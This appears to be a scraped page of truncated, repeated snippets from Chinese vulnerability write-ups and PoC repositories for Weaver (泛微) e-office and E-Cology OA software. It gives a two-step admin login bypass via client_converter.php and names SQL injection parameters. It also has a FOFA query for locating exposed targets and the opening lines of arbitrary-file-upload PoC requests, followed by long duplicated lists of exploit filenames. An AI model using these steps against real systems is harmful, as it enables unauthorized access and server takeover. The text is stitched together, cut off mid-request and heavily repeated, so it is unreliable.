漏洞标题:泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台 sql注入 /client_converter.php //userAccount lang funcID 越权 步骤一:/client_converter.php?userAccount=admin =cn(给session赋值) 步骤二:/general/system/user/userlist.php 缺陷编号:wooyun-2015-0112675 漏洞标题:泛微的OA系统(泛微E-CO...
泛微/webservice/upload/upload.php接口存在任意文件上传漏洞,导致获取服务器权限。 fofa app="泛微-EOffice" poc POST /webservice/upload/upload.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept-Encoding: gzip, ...
泛微e-office V9.0 漏洞复现: 代码语言:javascript 复制 POSThttp://ip:port/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=HTTP/1.1Host:ip:port User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/86.0.4240.111Safari/537.36Accept-Enco...
泛微-EMobile存在弱口令漏洞.md 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md 泛微E-Cology接口getFi...
泛微/webservice/upload/upload.php接口存在任意文件上传漏洞,导致获取服务器权限。 fofa app="泛微-EOffice" poc POST /webservice/upload/upload.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept-Encoding: gzip, deflat...
泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md 泛微E-Cology系统接口Si...
泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md 泛微E-Cology系统接...
泛微HrmCareerApplyPerView sql注入漏洞.md 泛微-EMobile存在弱口令漏洞.md 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过...
泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md 泛微E-Office-json_common.phpSQL注入漏洞.md 泛微E-Office-jx2_config存在信息泄露漏洞.md 泛微E-Office-uploadfile.php任意文件上传漏洞.md 泛微E-Office10-OfficeServer任意文件上传漏洞.md 泛微E-Office10版本小于v10.0_20240222...
泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md 泛微E-...